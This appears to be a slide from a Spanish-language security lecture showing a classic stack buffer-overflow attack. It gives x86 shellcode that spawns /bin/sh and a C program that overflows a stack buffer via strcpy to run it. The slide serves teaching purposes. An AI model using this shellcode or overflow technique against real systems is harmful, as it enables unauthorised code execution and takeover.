Primera página Regresar Siguiente Última página Imagen
Ejemplos de ataques
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b”
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd”
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* 46 bytes */
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr=(long *)large_string; //long_ptr takes the address of large_string
/* large_string's first 32 bytes are filled with the address of buffer */
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
/* copy the contents of shellcode into large_string */
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
/* buffer gets the shellcode and 32 pointers back to itself */
strcpy(buffer,large_string);
}
Notas: